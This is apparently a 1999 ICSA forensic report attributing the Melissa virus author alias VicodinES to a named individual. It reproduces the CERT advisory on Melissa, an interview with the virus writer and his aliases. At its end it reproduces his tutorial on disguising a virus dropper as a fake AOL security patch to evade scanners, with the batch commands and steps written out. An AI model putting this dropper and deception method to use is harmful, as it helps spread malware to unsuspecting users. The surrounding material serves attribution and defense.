Executive Summary
Conclusions and Unresolved Questions
Conclusions
ICSA's analysts believe David L. SMITH is probably the virus writer VicodinES.
We offer our analysis to help focus investigators. Forensic analysis of computers
SMITH had access to may be useful in conjunction with our analysis. Our analysis
relies on USENET posts developed by searching Dejanews, our own data collected
from the computer underground and by analysis of the viruses involved. We recognize
the analysis is neither conclusive nor can it be attributed to anyone with absolute
confidence. However our analysis may assist the finder of fact in establishing
the "scene" SMITH was involved in. Presuming SMITH is VicodinES, he
may be culpable for offenses in addition to those associated with the Melissa
virus.
Roger Thompson, Director of Vendor Labs, has analyzed the Global Unique Identifier
(GUID) of the Melissa macro virus and other macro viruses that VicodinES has
acknowledged authoring. The GUID is consistent with the same person authoring
Melissa as other macro viruses such as Class.A.poppy.
Our analysis of SMITH's and VicodinES's posts to USENET have found three chief
nodes in common, posts to the group nj.test, affinity to the Russian anti-virus
program, AVP and promotion of a web site for a category of music, the Industrial
Information Station.
Unresolved Questions
Records for at least four other America Online (AOL) screennames could be checked.
SMITH appears to have posted to USENET groups from at least five different AOL
accounts. According to press reports, at least one of these was usurped from
another, legitimate, AOL subscriber skyroket@aol.com . For example, on 8/4/96
VicodinD@aol.com posted to rec.drugs a message in which he wrote he was changing
his screename from PainfullD@aol.com, begging the question what happened to
the PainfullD account, was it illicit, discovered and deleted by it's legitimate
owner?
SMITH's employer(s) should be interviewed to determine what companies allowed
SMITH access to their systems. To post to USENET, SMITH appears to have used
systems owned or registered to J.P. Morgan, AT&T and Hoffman-LaRoche, all
listed as clients of CGS Computer Associates. These uses may be violations of
18 USC 1030 or similar state statutes. These firms may have a civil interest
in SMITH's use of their systems as well.
Records of SMITH's health care may reveal circumstantial evidence that when
considered in context are incriminating. Specifically records of prescriptions
for Vicodin ES, other pain killers and prescription drugs.
Melissa Virus
From CERT Advisory 99.04:
Overview:
At approximately 2:00 PM GMT-5 on Friday March 26 1999 we began receiving reports
of a Microsoft Word 97 and Word 2000 macro virus which is propagating via email
attachments. The number and variety of reports we have received indicate that
this is a widespread attack affecting a variety of sites.
Our analysis of this macro virus indicates that human action (in the form of
a user opening an infected Word document) is required for this virus to propagate.
It is possible that under some mailer configurations, a user might automatically
open an infected document received in the form of an email attachment. This
macro virus is not known to exploit any new vulnerabilities. While the primary
transport mechanism of this virus is via email, any way of transferring files
can also propagate the virus.
Anti-virus software vendors have called this macro virus the Melissa macro or
W97M_Melissa virus.
In addition to this advisory, please see the Melissa Virus FAQ (Frequently Asked
Questions) document available at:
http://www.cert.org/tech_tips/Melissa_FAQ.html
I. Description of the Melissa Virus
The Melissa macro virus propagates in the form of an email message containing an infected Word document as an attachment. The transport message has most frequently been reported to contain the following Subject header
Subject: Important Message From <name>
Where <name> is the full name of the user sending the message.
The body of the message is a multipart MIME message containing two sections. The first section of the message (Content-Type: text/plain) contains the following text.
Here is that document you asked for ... don't show anyone else ;-)
The next section (Content-Type: application/msword) was initially reported to be a document called "list.doc". This document contains references to pornographic web sites. As this macro virus spreads we are likely to see documents with other names. In fact, under certain conditions the virus may generate attachments with documents created by the victim.
When a user opens an infected .doc file with Microsoft Word97 or Word2000, the macro virus is immediately executed if macros are enabled.
Upon execution, the virus first lowers the macro security settings to permit all macros to run when documents are opened in the future. Therefore, the user will not be notified when the virus is executed in the future.
The macro then checks to see if the registry key
"HKEY_Current_User\Software\Microsoft\Office\Melissa?"
has a value of "... by Kwyjibo". If that registry key does not exist or does not have a value of "... by Kwyjibo", the virus proceeds to propagate itself by sending an email message in the format described above to the first 50 entries in every Microsoft Outlook MAPI address book readable by the user executing the macro. Keep in mind that if any of these email addresses are mailing lists, the message will be delivered to everyone on the mailing lists. In order to successfully propagate, the affected machine must have Microsoft Outlook installed; however, Outlook does not need to be the mailer used to read the message.
This virus can not send mail on systems running MacOS; however, the virus can be stored on MacOS.
Next, the macro virus sets the value of the registry key to "... by Kwyjibo". Setting this registry key causes the virus to only propagate once per session. If the registry key does not persist through sessions, the virus will propagate as described above once per every session when a user opens an infected document. If the registry key persists through sessions, the virus will no longer attempt to propagate even if the affected user opens an infected document.
The macro then infects the Normal.dot template file. By default, all Word documents utilize the Normal.dot template; thus, any newly created Word document will be infected. Because unpatched versions of Word97 may trust macros in templates the virus may execute without warning. For more information please see:
http://www.microsoft.com/security/bulletins/ms99-002.asp
Finally, if the minute of the hour matches the day of the month at this point, the macro inserts into the current document the message "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
Note that if you open an infected document with macros disabled and look at the list of macros in this document, neither Word97 nor Word2000 list the macro. The code is actually VBA (Visual Basic for Applications) code associated with the "document.open" method. You can see the code by going into the Visual Basic editor.
If you receive one of these messages, keep in mind that the message came from someone who is affected by this virus and they are not necessarily targeting you. We encourage you to contact any users from which you have received such a message. Also, we are interested in understanding the scope of this activity; therefore, we would appreciate if you would report any instance of this activity to us according to our Incident Reporting Guidelines document available at:
http://www.cert.org/tech_tips/incident_reporting.html
[end of excerpt from CERT Advisory] (Appendix 1)
VicodinES
Sequence:
VicodinES@aol.com starts posting about rec.music.industrial and drugs in April
95
Drlortab@aol.com starts posting to rec.music.industrial in March 96
Painfulld@aol.com makes four posts in July 96 to rec.music.industrial and alt.drugs
and changes his address to vicodind@aol.com
Vicodini@aol.com makes two posts in Sep 96 to rec.music.industrial.
Dlsmith@monmouth.com post to sci.med.pharmacy in Feb 97 followed by rec.music.industrial
in July 97
Doug Winterspoon starts posting to alt.comp.virus in Sep 97
On 10/18/97 and 10/19/97 Ane@tnn.com, Vic@tnn.com, Doug Winterspoon all post
to nj.test
Vic@klonopin.com posts on 10/18/97 to alt.comp.virus
On 12/25/97 and 12/28/97 skyroket@aol.com posts virus infected files to porn
groups
On 2/4/98 Vic@bite-me.org starts posting to alt.comp.virus
On 3/11/98 xanax.smith@feedme starts posting to alt.comp.virus
Vicodines@my-dejanew.com starts posting to virus groups on 6/25/98
Ibuprofen@my-dejanews.com starts posting to virus groups on 10/15-12/23/98 from
IP's that appear to belong to corporate clients of his employer.
VDAT/Cicatrix Interview (August 97)
An August 1997 "interview" of the virus author VicodinES by "Cicatrix"
published in the virus exchange group VDAT reveals several details that point
towards David L. SMITH. VicodinES states he was 14 or 15 years of age when his
father purchased a TI-99 4/A computer. These computers were popular in the mid-80's
making VicodinES' year of birth somewhere near 1970 and thus his present age
would be about 30. He became involved in the virus scene because he was bored
and high on prescription painkillers.
When asked why he names his viruses "poppy," he replies, "They
all end in .Poppy because I am a pill-head and all the good pills come from
the poppy plant!"
He admits to being part of "The Narkotic Network," and there are three
person in the network, Klonopin.Jones, and Fastin.Blee.
When asked how he came by the handle "VicodinES," he answered, "VicodinES
is a the name for a painkiller here in the US. It's actually Vicodin Extra Strength.
I love those little fucking pills so I took that name. It's just Hydrocodone
and Tylanol. Anyway I was very high on the little bastards when I decided to
start writing virii so I thought it was appropriate."
In the interview, he states he prefers the anti-virus program AVP.
He claims the e-mail address " vcru@hotmail.com." A check of Dejanews
revealed 33 posts with this address all to alt.binaries.pictures.erotica with
the name Dan Johnson. Our analysis does not include this as a significant alias
with regard to viruses.
In the interview he also acknowledges several entities that will occur again,
specifically: Monkey, Mousey and The Woobie, Klonopin Jones and Fastin.Blee.
Klonopin.Jones
Klonopin Jones jones@thermal1.fiu.edu posted to rec.music.industrial
on 10/5/95 with his mailer setting including "Organization: Industrial
Information Station" and the name "Kinzy Jones Jr." at Florida
International University. N.B. Klonopin is a proprietary anti-anxiety drug
VicodinES used the alias vic@klonopin.com to post to alt.comp.virus on 10/18/97.
Klonopin is a domain registered to Hoffman-LaRoche. Hoffman-LaRoche is listed
on a web page of David L. SMITH's employer, CGS Computer Associates. If this
address was legitimate, it may indicate SMITH was using Hoffman-LaRoche systems
illicitly.
Industrial Information Station & rec.music.industrial
Painfull D painfulld@aol.com posted to rec.music industrial on 7/11/96
with the following text:
Three cats :
Monkey (calico female) - likes ambient music - mostly Delerium
Mousey (siamese male) - likes hard fast ebm and beating up on monkey
Woobie (persian / siamese male) - he's deaf so he has no idea what music is....poor woobie[d]
The IIS : http://www.fiu.edu:80/~wjones01/kd.htmlps yes I named my cats stupid names but they fit - what else could I do? :)
then on 8/4/96, Vicodin D vicodind@aol.com posted to alt.drugs with the following text:
[d]
Painfull D --> is now Vicodin D (aol problems)
VicodinES vicodines@aol.com posted to 36 times to rec.music industrial, and on 1995/04/16 that he lives in Florida.
Posts to nj.test
On 10/17-10/18/97 only four different senders posted to the USENET group nj.test.
Three of these four are associated with David SMITH/VicodinES. On 10/17/97,
Anexia (Ane@tnn.com) and VicodinES (Vic@tnn.com) posted test messages. On 10/18/97,
VicodinES posted again, as did Doug Winterspoon (nomail@nospam.com) . The only
other poster to this group was Jack (jack@REMOVE-TO-REPLY.superlink.net) who
we do not believe is related to the Melissa author.
Doug Winterspoon
Doug Winterspoon, who used the email addresses of (not@no.com and nomail@nospam.com
was a prolific poster to alt.comp.virus On 12/7/97 he posted to alt.art.marketplace
and in the text of the message asked that replies be sent to dlsmith@monmouth.com
address. This address coincides with an address believed to be David L. SMITH's.
DL Smith
DLSmith who used these email addresses on USENET: dlsmith@anti.spam.monmouth.com,
dlsmith@monmouth.com, and dlsmith@monmouth.com.remove.this has an affinity towards
the computer game Ultima Online, industrial music, drugs and computer viruses.
During the period 2/4/99 to 3/18/99, using the address dlsmith@anti.spam.monmouth.com
he posted from a client that appears to be inside AT&T Labs Research, Florham
Park, NJ as indicated by both the "organization" and NNTP posting
host. AT&T is a client of SMITH's employer.
Ibuprofen
Alt.TV.simpsons post
On 10/26/98, this identity posted to alt.tv.simpsons. This is the only link
from SMITH/VicodinES to The Simpsons TV show which is referred to within the
Melissa virus.
Signed a message Doug W
On 10/20/98, this identity posted to microsoft.public.scripting.vbscript and
signed the message, "Doug W" linking this identity to Doug Winterspoon.
IP addresses for the clients posting with this identity belong to CGS Computer
Associates' Clients
Of the seven posts using this identity, two appear to have come from clients
with IP addresses assigned to Monmouth Internet. Four IP addresses are assigned
to JP Morgan, listed on http://www.cgscai.com/cgs/clients.asp as a client of
CGS Computer Associates. The final IP address is assigned to Cable & Wireless;
we know of no known assocaition between SMITH and C&W.
Sky Roket
Posted macro viruses to pornography groups on 12/25/97 and 12/28/97 before Melissa.
Vicodin D and Painful D at AOL are the same person
Post made 8/4/96 cited AOL problems
Vic@klonopin.com may be Hoffman-LaRoche's system
On 10/18/97 this identity posted one time to alt.comp.virus. Klonopin.com is
registered to Hoffman-La Roche, another of CGS Computer Associates' clients.
Multiple aliases and clients
SMITH seldom posted to USENET from more than one identity on any given day.
For those posts that originated from other than America Online, it appears that
SMITH's prefered news client is Netscape Navigator/Communicator. The pattern
of changes to his alias is consistent with choosing an alias for a day or some
other time period and not changing mid-session. Changing the identity in Netscape
is relatively straightforward, but sufficiently complicated that making frequent
changes would be time-consuming.
Appendix 1 CERT Advisory
CERT Advisory CA-99-04-Melissa-Macro-Virus
Original issue date: Saturday March 27 1999
Last Revised: Saturday March 27, 1999
Systems Affected
* Machines with Microsoft Word 97 or Word 2000
* Any mail handling system could experience performance problems or a denial
of service as a result of the propagation of this macro
virus.
Overview
At approximately 2:00 PM GMT-5 on Friday March 26 1999 we began receiving reports of a Microsoft Word 97 and Word 2000 macro virus which is propagating via email attachments. The number and variety of reports we have received indicate that this is a widespread attack affecting a variety of sites.
Our analysis of this macro virus indicates that human action (in the form of a user opening an infected Word document) is required for this virus to propagate. It is possible that under some mailer configurations, a user might automatically open an infected document received in the form of an email attachment. This macro virus is not known to exploit any new vulnerabilities. While the primary transport mechanism of this virus is via email, any way of transferring files can also propagate the virus.
Anti-virus software vendors have called this macro virus the Melissa macro or W97M_Melissa virus.
I. Description
The Melissa macro virus propagates in the form of an email message containing an infected Word document as an attachment. The transport message has most frequently been reported to contain the following Subject header
Subject: Important Message From <name>
Where <name> is the full name of the user sending the message.
The body of the message is a multipart MIME message containing two sections. The first section of the message (Content-Type: text/plain) contains the following text.
Here is that document you asked for ... don't show anyone else ;-)
The next section (Content-Type: application/msword) was initially reported to be a document called "list.doc". This document contains references to pornographic web sites. As this macro virus spreads we are likely to see documents with other names. In fact, under certain conditions the virus may generate attachments with documents created by the victim.
When a user opens an infected .doc file with Microsoft Word97 or Word2000, the macro virus is immediately executed if macros are enabled.
Upon execution, the virus first lowers the macro security settings to permit all macros to run when documents are opened in the future. Therefore, the user will not be notified when the virus is executed in the future.
The macro then checks to see if the registry key
"HKEY_Current_User\Software\Microsoft\Office\Melissa?"
has a value of "... by Kwyjibo". If that registry key does not exist or does not have a value of "... by Kwyjibo", the virus proceeds to propagate itself by sending an email message in the format described above to the first 50 entries in every MAPI address book readable by the user executing the macro. Keep in mind that if any of these email addresses are mailing lists, the message will be delivered to everyone on the mailing lists. In order to successfully propagate, the affected machine must have Microsoft Outlook installed; however, Outlook does not need to be the mailer used to read the message.
Next, the macro virus sets the value of the registry key to "... by Kwyjibo". Setting this registry key causes the virus to only propagate once per session. If the registry key does not persist through sessions, the virus will propagate as described above once per every session when a user opens an infected document. If the registry key persists through sessions, the virus will no longer attempt to propagate even if the affected user opens an infected document.
The macro then infects the Normal.dot template file. By default, all Word documents utilize the Normal.dot template; thus, any newly created Word document will be infected. Because unpatched versions of Word97 may trust macros in templates the virus may execute without warning. For more information please see:
http://www.microsoft.com/security/bulletins/ms99-002.asp
Finally, if the minute of the hour matches the day of the month at this point, the macro inserts into the current document the message "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
Note that if you open an infected document with macros disabled and look at the list of macros in this document, neither Word97 nor Word2000 list the macro. The code is actually VBA (Visual Basic for Applications) code associated with the "document.open" method. You can see the code by going into the Visual Basic editor.
If you receive one of these messages, keep in mind that the message came from someone who is affected by this virus and they are not necessarily targeting you. We encourage you to contact any users from which you have received such a message. Also, we are interested in understanding the scope of this activity; therefore, we would appreciate if you would report any instance of this activity to us according to our Incident Reporting Guidelines document available at:
http://www.cert.org/tech_tips/incident_reporting.html
II. Impact
* Users who open an infected document in Word97 or Word2000 with macros enabled will infect the Normal.dot template causing any documents referencing this template to be infected with this macro virus. If the infected document is opened by another user, the document, including the macro virus, will propagate. Note that this could cause the user's document to be propagated instead of the original document, and thereby leak sensitive information.
* Indirectly, this virus could cause a denial of service on mail servers. Many large sites have reported performance problems with their mail servers as a result of the propagation of this virus.
III. Solutions
* Block messages with the signature of this virus at your mail transfer agents.
With Sendmail
Nick Christenson of sendmail.com provided information about configuring sendmail to filter out messages that may contain the Melissa virus. This information is available from the follow URL:
ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-melissa-filter.txt
* Utilize virus scanners
Most virus scanning tools will detect and clean macro viruses. In order to detect and clean current viruses you must keep your scanning tools up to date with the latest definition files.
+ McAfee / Network Associates
http://vil.mcafee.com/vil/vm10120.asp
http://www.avertlabs.com/public/datafiles/valerts/vinfo/melissa.asp
+ Symantec
http://www.symantec.com/avcenter/venc/data/mailissa.html
+ Trend Micro
http://housecall.antivirus.com/smex_housecall/technotes.html
* Encourage users at your site to disable macros in Microsoft Word
Notify all of your users of the problem and encourage them to disable macros in Word. You may also wish to encourage users to disable macros in any product that contains a macro language as this sort of problem is not limited to Microsoft Word.
In Word97 you can disable automatic macro execution (click Tools/Options/General then turn on the 'Macro virus protection' checkbox). In Word2000 macro execution is controlled by a security level variable similar to Internet Explorer (click on Tools/Macro/Security and choose High, Medium, or Low). In that case, 'High' silently ignores the VBA code, Medium prompts in the way Word97 does to let you enable or disable the VBA code, and 'Low' just runs it.
Word2000 supports Authenticode on the VB code. In the 'High' setting you can specify sites that you trust and code from those sites will run.
* General protection from Word Macro Viruses
For information about macro viruses in general, we encourage you to review the document "Free Macro AntiVirus Techniques" by Chengi Jimmy Kuo which is available at.
http://www.nai.com/services/support/vr/free.asp
Acknowledgements
We would like to thank Jimmy Kuo of Network Associates, Eric Allman and Nick Christenson of sendmail.com, Dan Schrader of Trend Micro, and Jason Garms and Karan Khanna of Microsoft for providing information used in this advisory.
Additionally we would like to thank the many sites who reported this activity.
______________________________________________________________________
This document is available from:
http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html.
______________________________________________________________________
CERT/CC Contact Information
Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.
CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.
Using encryption
We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key. If you prefer to use DES, please call the CERT hotline for more information.
Getting security information
CERT publications and other security information are available from our web site http://www.cert.org/.
To be added to our mailing list for advisories and bulletins, send email to cert-advisory-request@cert.org and include SUBSCRIBE your-email-address in the subject of your message.
Copyright 1999 Carnegie Mellon University.
Conditions for use, disclaimers, and sponsorship information can be found in http://www.cert.org/legal_stuff.html.
* "CERT" and "CERT Coordination Center" are registered
in the U.S.
Patent and Trademark Office
______________________________________________________________________
NO WARRANTY
Any material furnished by Carnegie Mellon University and the Software Engineering
Institute is furnished on an "as is" basis. Carnegie Mellon University
makes no warranties of any kind, either expressed or implied as to any matter
including, but not limited to, warranty of fitness for a particular purpose
or merchantability, exclusivity or results obtained from use of the material.
Carnegie Mellon University does not make any warranty of any kind with respect
to freedom from patent, trademark, or copyright infringement.
______________________________________________________________________
Revision History
Appendix 2 VicodinES-Cicatrix Interview
Interview with VicodinES (1997) (emphasis added by ICSA)
by Cicatrix
[IS/Recon Note: from html publication produced by computer virus exchange group VDAT August 1997 Boldface emphasis is ours indicating significant data in the interview.]
How did you start out in computers?
I was 14 or 15 and my dad purchased a TI-99 4/A and I started teaching myself BASIC. Programs were loaded with a cassette tape :) A buddy of mine had one with a modem and we used to call all these bbs's long distance on stolen calling card numbers. We would read sex stories, curse out people on "the war boards" and download files on how to make bombs and such. The time-frame here was like 1982? Maybe a bit later. I also ran a small bbs for a time called "The Electric Death BBS" on a very early Compaq Lugable (fucking thing must have been 30 pounds) ... it was around the same time.
How and when did you start out in the virus scene?
Hmmm, honestly I was bored, really high on prescription painkillers (purchased not prescribed) and I decided to do some assembly programming again.
Have you written viruses? If so which would you like to take credit for?
Yes I write virii and I don't want to take any credit for the massively hacked virii that I stuck a bunch of AOL'ers with. Beta's are a bitch! Ummm I will take credit for anything that infected your system, even if I didn't program it. If it annoyed you then I want credit for it :)
How do you name your viruses?
They all end in .Poppy because I am a pill-head and all the good pills come from the poppy plant! Why? Why not? They all get their first names by accident.
Which programming languages do you know?
I took COBOL in high school but I forgot most of it. I know Modula and Pascal. I also do ok in Assembly and C++. I am working on my Visual C++ skills right now because I have a really good idea for my next virus ;)
What programming language do you like using the most?
They all suck!
Are you a member of a VX group?
I am part of The Narkotic Network. There is just three of us.
Which AV software do you like/respect the most? Which the least?
I use AVP the most so I guess I like that the best. I have a copy of every AV product on my hd so I can keep track of what programs can find what virii and to cross check my work. I don't really hate any of them - I don't have emotional attachments to any AV products.... I take that back I LOVE the ones that still can find my virii!
What are your goals (VX wise)?
To annoy countless users worldwide.
What is your view on the continuous 'war' between VX and AV.
Don't really know much about it.
Where did you get you handle? What does it mean?
VicodinES is a the name for a painkiller here in the US. It's actually Vicodin Extra Strength. I love those little fucking pills so I took that name. It's just Hydrocodone and Tylanol. Anyway I was very high on the little bastards when I decided to start writing virii so I thought it was appropriate.
What is your view on Virus Creation software (eg. VCL, PS-MPC etc.)?
I played with NuKE NRLG and PS G2. I thought they were pretty cool. I liked the basic idea behind DREG - I never got a copy of the program (basically never bothered to download it) but I liked they whole philosophy behind it.
What is your view on macro viruses vs. assembly or HLL viruses?
Macro's are cool by me. I think sometimes it's way too easy to create a new variant of a macro but I have seen some that really impressed me. I won't ever write one but that's my preference. HLL virii are the way to go. You can really kick some fucking ass with a C++ virii in 95 - just wait, you will see. I have also heard that someone is working on Microsoft Scripting virii? Kinda like batch virii in 95 .. but I haven't seen anything yet.
Have you ever confirmed one of your viruses 'in-the-wild'?
Too early to tell for me. Though I do have confirmation of 300+ people downloading an infected WinZip of mine. It was a carrier of Skim.Poppy so I suspect that one will do me proud. Hey Joe Wells get used to typing the word "POPPY" :)
Which VX E-zine do you like to most? Which the least?
I like 40 Hex - I re-read them now and again. The best new one is Xine. 29A is also cool.
Which individual or what group do you like/respect in the VX world?
I don't know any. I only respect those that helped me with or without knowing. People like Polt from the WCIVR and Cicatrix also AV'ers like Eugene Kaspersky who answered my questions without bias.
In the AV world?
see above
Which individual or what group do you like/respect outside the VX or the AV world?
I like UPS in warez!! Fuckin' BIG UP'S FELLAZ! I also thought Da Chronic was amazing with AOHell. It's a simple thing now but unheard of when it came out. AOHell was even in Newsweek. New ideas don't need to be complex to gain my respect they just have to work. Da Chronic deserves much credit!
What is your view on destructive payloads in viruses?
Counter productive.
Do you think there is such a thing as a 'good' virus?
All mine are good, I don't understand the question :)
What do you do in 'real' life?
I run the MIS dept. for a large engineering firm (I only run one location though) and I am industrial music artist on the side. You may one day own one of my cd's.
Do people outside the VX scene know what you do (parents, girlfriend etc.)?
Not many - I don't invite people to judge my actions.
Do you do other computer stuff outside VX (Hacking, phreaking, warez etc.)?
I dabble in warez. Fastin.Blee does more warez than I do. He keeps me in the scene.
Should viruses be illegal? Is there a difference between creation and spreading?
I don't think in those terms. I am not governed by other peoples morals. I wouldn't really take any heed in any laws. I would be forced to if it directly affected me but until it does I won't waste time on debating those issues with anyone or myself.
Describe the perfect virus.
I would end up spouting off "the one that was never caught" cliché here so I will pass.
What is your view on Windows (95)
Undiscovered country. Do yourself a favor and buy Andrew Schulman's "Unauthorized Windows 95 Developer's Resource Kit" - I am a big fan of GUI. I started in a text only world and I have no problems seeing it go away.
What is your advice for people just starting out?
I am not a good one for advice. Too selfish and sarcastic to be taken at face value, sorry.
Where can you be reached if at all?
vcru@hotmail.com
Any greets?
Yea shouts out to Klonopin.Jones, Fastin.Blee, Flexoral.DeZego, DeadPete, Mudcat "Grave" Rose, Monkey, Mousey and The Woobie!
Any other comments?
Yes my Turn-On's are skinny little blonde chicks with straight hair, very strong thuderstorms and getting free painkillers. Oh and one other thing don't think you can invite me over to your house without me searching your bathroom medicine cabinet for painkillers. I will steal them, you can count on that.
Short responses to the following names or words:
- Dark Avenger - created MtE right? If so then he rules!
- Dark Angel - some virus guy who followed the rules and took a "spooky"
name just like all the other sheep. What his accomplishments are I have no idea.
- Sarah Gordon - Isn't she the queen of misinformation? I could be wrong here.
- Fridrik Skulason - AV guy from Iceland
- many fat chicks come from Iceland
- I have seen Björk's tits and she has nasty ones
- ugggh don't go to Iceland
- Alan Solomon - AV guy from DSAV - name makes me think he is fat.
- WordBasic/VBA - cross-platform virii courtesy of Bill Gates
- VDAT - I dig it
- VSUM - loads of mistakes - bad source of information
- Assembler - not a good language for 95 virii
- NuKE - A group who I think are cool
- Phalcon Skism - I really don't know the difference between any of the groups
but I think these guys did a good job with G2
- VLAD - I have borrowed some ideas from these ingenious fellows
- I give you credit here and on my website.
- Trident - some poly engine right?
- Polymorphic - waste of time - just don't get detected in the first place
- Stealth - waste of time in 95 - no one uses TBAV in the US anyway so I don't
bother to think about stealth
- I hate...... <list too long to print>
- I love...... chocolate ice cream pops from Shop Rite and a 2
liter of Diet Mountain Dew on an empty stomach
- IRC - crap - who wants to chat while they are on a computer anyway - fucking
waste of time
- Sex - not as big of a driving force as in my life as it seems to be for others
but I love to fuck when I get the chance
How and why did you get TNN started?
I told these two other guys (Klonopin.Jones + Fastin.Blee) who were helping me distribute, debug and design virii that they were now in a group and they didn't argue - so The Narkotic Network was born.
How is TNN organized?
Honestly there isn't much to be organized. I just kinda do what I want with it.
How are your other tutorials coming along?
I have mixed feelings on tutorials. I don't deny the fact that I have learned a TON from tutorials but I'm not so sure I am that comfortable giving away all my ideas. I may not write any more tutorials. I have noticed a few errors in my first tutorial anyway and I can't deal with the constant proof reading I do in my head after I post my ideas.
Will you ever release a virus creator?
I don't have that much free time. I divide my free time between programming and music. I have a computer dedicated to the internet and virii and one dedicated to running my samplers, drum machines and syths.
What is in your future and the future of TNN?
I want to turn the Narkotic Network web site into a a site where I ask total strangers to send me all the drugs in their medicine cabinet. But, I don't think I can get away with that. I really want to do that but I don't want to risk it all and get caught! I guess we will just keep moving forward with more complex virii and maybe more information. I will probably even relocate when GeoShitties kills the site.
Will TNN increase the number of members?
I don't really know. The Vx culture moves very slow and seems to communicate very little (I have made attempts to cross pollinate with very little success) so for right now three members is as good as it gets. I also tried to get on #virii once to "hang" but I didn't have my IRC setup to +o super-dork access so no chat for me.
Will TNN go into other scenes except VX? (hacking, etc.)
We actually move a lot of warez. If you're into virii you gotta think about distribution and if we stay up on whats hot then we can infect you when you least expect it!
Appendix 3 Aliases
|
|
|
|
|
a.k.a. Doug Smith dlsmith@monmouth.com
|
Nj.test
|
Virus Writer
|
|
Doug Winterspoon
|
AVP
|
Painfulld@aol.com
|
|
Ibuprofen@my-dejanews.com
|
IIS & Klonopin.Jones |
VicodinD@aol.com
|
|
Xanax.smith@feedme
|
||
|
VicodinI@aol.com
|
||
|
VicodinES@aol.com
|
||
|
Anexsia <ane@tnn.com
|
||
|
Dr Lortab drlortab@aol.com
|
||
|
Skyroket skyroket@aol.com
|
The VicodinES
Ok so you managed to get over your first hurdle, you managed to make/hack/remix a memory resident *.com file infecting virus. Congratulations! I mean that wholeheartedly. So now what? Did you spend all that time learning and debugging .asm files just so it would sit on your HD? No? I didn't think so. So what's your next move? DISTRIBUTION!
The first rule of distribution for a file infector is demand. You must create
a demand or use a program that is in demand as a host. Without demand your file
will never be downloaded or run.
Second, deception! You must be able to get your virus past most AV products
or you will never get a chance to infect. How is your code? Can you sneak by
heuristics? You will need a way to sneak your virus passed the most common AV
programs, even if you're heuristically challenged. Can that be done? Yes, a
clever dropper can do that. How? .... read on.
Third, infection! Infect on the first run! This also requires a Decently clever
dropper. What good is a memory resident *.com infecting virus if it's run and
then no .com files are run the entire time it's resident. Then *poof* someone
shuts off the computer and never runs your dropper again? That would be fine
if you had written a multipartite virus but for this first example we are concentrating
on a beginners virus, a basic *.com memory resident file infector.
Ok so I say that Virus Distribution consists of three basic components:
DEMAND, DECEPTION and INFECTION. Am I right? Is this a sound theory? Well let
me back up my theory with an example or two.
EXAMPLE #1:
The Virus: *.com memory resident file infector. (virus.com)
Tools Needed: Tlink, Bat2exe, the virus.obj file (you can find Bat2exe
from filez.com if you don't already have it and you must already have Tlink
and
the .obj file if you wrote the virus!)
Ok so you have everything you need and you're just dying to infect the world. Ok, give it some thought. Think "DEMAND." In this example we will capitalize on a current issue and create demand. In this case we dream up an "AOL IE 3.0 Security Patch" and our method of distribution will be AOL and USENET. You see, I have already done this. When AOL had their big crash I created an Anti-Crash "AOL Approved" Downloadable Patch. You say no one would ever fall for that :) .. yea right! So I just retooled that idea for "right now" - AOL only came out with a patch for their IE integrated browser on 7-7-97 :) .... Anticipate demand, create demand or capitalize on demand. Ok so now everyone who uses AOL will want to be secure, and you have made a program that is in demand. With demand out of the way we need to concentrate on deception. Now, most computer users are not that bright but they know better than to just run a .bat file - hell I have even heard that some computer users even know how to view .bat files and look for suspicious content! So we will hide our .bat file in a .com. (realistically though your chance won't drop that much if you just leave it as a .bat)
Ok lets make that dropper!
1. Rename tlink.exe to patch.exe
2. Rename virus.obj to patch.obj
3. Create a nice descriptive .doc or readme.txt file to calm the user's
nerves.
4. Create a .bat file that acts like your file description.
aol_ie.bat :
cls
echo Press any key to update your Internet Explorer For
America Online
pause>nul
patch /t patch.obj ;link the virus
patch ;run the virus
command ;call command.com for infection
5. bat2exe your aol_ie.bat - it will result in aol_ie.com [you can skip
this part if you have to]
6. Package your files into a nice .zip or if you want you can use a self
extracting compression program but use one with an icon!! (WinZip or
RAR) [icons calm new computer user's nerves!]
So your zip will contain :
patch.exe [why did you rename tlink.exe? patch goes with the flow better than
tlink.exe
and will not arouse suspicion]
patch.obj [why did you rename virus.obj? also goes with the flow better]
aol_ie.com [the dropper .bat converted to .com]
readme.txt [be creative here!!]
*** [EXTRA] Take it a bit further! . If you want to you can add a few extra steps like creating a .pif for your .com [or .bat] or by including a hidden .ico or .dll file to go along with your .pif . use your imagination ***
*** [EXTRA] Take it a bit further! ... You can also fatten up your zip with miscellaneous files of varying size renamed to patch.dat or something equally innocuous ***
*** [Snag?] Did we hit a snag? . What if they view these files with a hex editor or text editor? No problem - all they will see is the inside of tlink.exe or some commands in aol_ie.com like patch and pause, certainly nothing to be alarmed about :) ***
So is the deception complete? More than you may realize. They downloaded your zip and scanned it. They did a deep or heuristic scan!!! Are you worried? Should you worry because your virus is heuristically challenged? Not really - you have a 75% better chance of beating heuristics in .obj form :) ... don't believe me? Test that one yourself. Also your aol_ie.com has the pause command in it. What virus pauses before it infects? Do you know of one? It doesn't make logical sense ... that's why we do it.
Finally, we need instant infection. Wait, that's already done. Did you catch
it? The third to last line in our bat links the viral code and creates the actual
virus. The second to last line runs our virus which, in turn goes memory resident.
Then the last line of our very simple dropper runs command.com. We just went
memory resident and then got command.com! Hell that means that even if our user
has Win95 we still get a chance to go active every time they invoke a DOS Prompt
or Shut Down To DOS. Also our heuristically challenged virus wasn't even created
until after the download was scanned and no current AV programs (that I know
of) support heuristics in their memory esident
scanner!
So in example #1 I demonstrated how some thought and ingenuity combined with my theory of "Better Distribution" can increase your chances of infecting a new machine and spreading. Example #1 only deals with a very simple virus and limited targets (how many .com files can you find on your system?) ... but our mission was to increase the chances of infection and survival and we did that 10 fold!!
